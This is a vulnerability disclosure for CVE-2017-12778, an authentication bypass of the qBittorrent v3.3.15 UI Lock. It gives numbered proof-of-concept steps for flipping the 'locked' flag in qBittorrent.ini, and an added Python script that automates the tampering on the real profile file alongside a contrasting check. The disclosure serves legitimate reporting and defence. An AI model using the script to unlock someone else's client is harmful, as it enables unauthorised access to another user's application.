[CVE-2017-12778] qBittorrent UI Lock - Authentication Bypass

Product Description

The qBittorrent project aims to provide an open-source software alternative to µTorrent.

Overview

The qBittorrent UI Lock functionality was vulnerable to authentication bypass. From the assessment of the product, it was noted that the UI Lock screen is supposed to protect against unauthorised access to qBittorrent features and functionality. The affected version of the product did not enforce a robust authentication mechanism: the lock state is stored as a flag in the client-side configuration file, so the UI Lock can be bypassed by tampering with that flag.

Impact

The UI Lock feature is intended to prevent unauthorised access to qBittorrent's features and functionality. Because the lock is enforced by a flag in a user-writable configuration file rather than by an authentication check, anyone with access to the user's profile directory can disable the lock and use every function of the product without knowing the password.

Proof-of-Concept

1. Launch qbittorrent.exe

2. Click the lock icon (Lock qBittorrent) in the upper right-hand corner and set a password

3. After successfully entering the password, verify that the software asks for the password when the window is opened from the system tray icon or by launching the exe file again

4. To bypass this password prompt, open Windows Task Manager and kill the qbittorrent.exe process

5. Go to Run and type %appdata%. Windows Explorer will open

6. Open the qBittorrent folder inside C:\Users\<username>\AppData\Roaming

7. Open the qBittorrent configuration text file (qBittorrent.ini) and locate the locked attribute within the [Locking] stanza

8. Change the value of the locked attribute to false

9. Relaunch qbittorrent.exe. The UI Lock authentication is now bypassed and the application starts without a password prompt.
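The steps above, reproduced as an added example (not code from the original advisory or from the qBittorrent project). It works on a constructed copy of the [Locking] stanza rather than a real profile: bypass_ui_lock() flips only the locked flag, exactly as step 8 does, and leaves the stored password untouched. The two checker functions contrast the affected behaviour (the prompt is shown only when locked=true) with an alternative check that treats a configured password as "locked" regardless of the flag. The file name qBittorrent.ini under %APPDATA%\qBittorrent and the placeholder password value are assumptions made for the example.

```python
import configparser
import io
import os

# Constructed sample of the [Locking] stanza as qBittorrent writes it after
# "Lock qBittorrent" has been used. The password value is a placeholder, not a
# real hash taken from the product (assumption for this example).
SAMPLE_INI = """[Locking]
locked=true
password=@ByteArray(placeholder-password-hash)

[Preferences]
General\\Locale=en
"""

# Assumed location of the profile configuration on Windows (step 5-7 of the PoC).
DEFAULT_INI_PATH = os.path.join(os.environ.get("APPDATA", ""), "qBittorrent", "qBittorrent.ini")


def load_ini(text):
    """Parse INI text the way the PoC reads it: keys are case-sensitive and
    values like @ByteArray(...) contain '%'-free text, so interpolation is off."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def bypass_ui_lock(text):
    """Step 8 of the PoC: set Locking/locked to false and change nothing else.
    Returns the tampered INI text."""
    cp = load_ini(text)
    if cp.has_section("Locking") and cp.get("Locking", "locked", fallback="false").lower() == "true":
        cp.set("Locking", "locked", "false")
    out = io.StringIO()
    cp.write(out, space_around_delimiters=False)
    return out.getvalue()


def bypass_ui_lock_file(path=DEFAULT_INI_PATH):
    """Apply the same tampering to a file on disk (qBittorrent must not be
    running, otherwise it overwrites the file on exit: step 4 of the PoC)."""
    with open(path, "r", encoding="utf-8") as fh:
        original = fh.read()
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(bypass_ui_lock(original))


def ui_lock_engaged_as_shipped(text):
    """Affected behaviour: the lock screen is shown only when locked=true,
    so the flag alone decides whether a password is ever asked for."""
    cp = load_ini(text)
    return cp.getboolean("Locking", "locked", fallback=False)


def ui_lock_engaged_password_bound(text):
    """Alternative check: consider the UI locked whenever a password is
    configured, so flipping the flag by itself no longer helps. Note this is
    still defeatable by editing or deleting the password line, because the
    file is writable by the same user; a client-side file cannot authenticate."""
    cp = load_ini(text)
    return bool(cp.get("Locking", "password", fallback=""))
```

Running bypass_ui_lock(SAMPLE_INI) yields a stanza with locked=false and the password line intact; ui_lock_engaged_as_shipped() then returns False for the tampered text while ui_lock_engaged_password_bound() still returns True. The broader caveat stands: any lock whose state and secret live in a file the same Windows user can edit is a convenience against casual access, not an authentication boundary.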

Affected Component

  • UI Lock Feature
  • qBittorrent config file

Affected Product

qBittorrent v3.3.15

Risk Rating (CVSS 2)

Base Score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)

Credit

This vulnerability was discovered by Min Thu Han

Disclosure Timeline

  • 09-08-2017: Vulnerability discovered
  • 09-08-2017: Vendor notified
  • 11-08-2017: No reply from the vendor
  • 11-08-2017: Decision taken to disclose the vulnerability on the vendor's open-source forum
  • 11-08-2017: Vulnerability report posted in the vendor forum